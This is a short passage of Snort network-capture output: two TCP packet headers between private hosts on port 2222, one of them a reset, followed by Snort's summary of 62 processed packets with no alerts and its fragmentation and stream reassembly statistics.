len:0x43 192.168.128.50:2222 -> 192.168.20.11:1672 TCP TTL:64 TOS:0x0 ID:1199 IpLen:20 DgmLen:53 DF ***AP*** Seq: 0xCC5BFD4A Ack: 0xCC1DCE09 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 37291 115107592 65 e =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:59:09.375205 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x3C 192.168.20.11:1672 -> 192.168.128.50:2222 TCP TTL:254 TOS:0x0 ID:44640 IpLen:20 DgmLen:40 *****R** Seq: 0xCC1DCE09 Ack: 0x0 Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ =============================================================================== Snort processed 62 packets. Breakdown by protocol: Action Stats: TCP: 55 (88.710%) ALERTS: 0 UDP: 7 (11.290%) LOGGED: 0 ICMP: 0 (0.000%) PASSED: 0 ARP: 0 (0.000%) IPv6: 0 (0.000%) IPX: 0 (0.000%) OTHER: 0 (0.000%) =============================================================================== Fragmentation Stats: Fragmented IP Packets: 0 (0.000%) Rebuilt IP Packets: 0 Frag elements used: 0 Discarded(incomplete): 0 Discarded(timeout): 0 =============================================================================== TCP Stream Reassembly Stats: TCP Packets Used: 0 (0.000%) Reconstructed Packets: 0 (0.000%) Streams Reconstructed: 0 ===============================================================================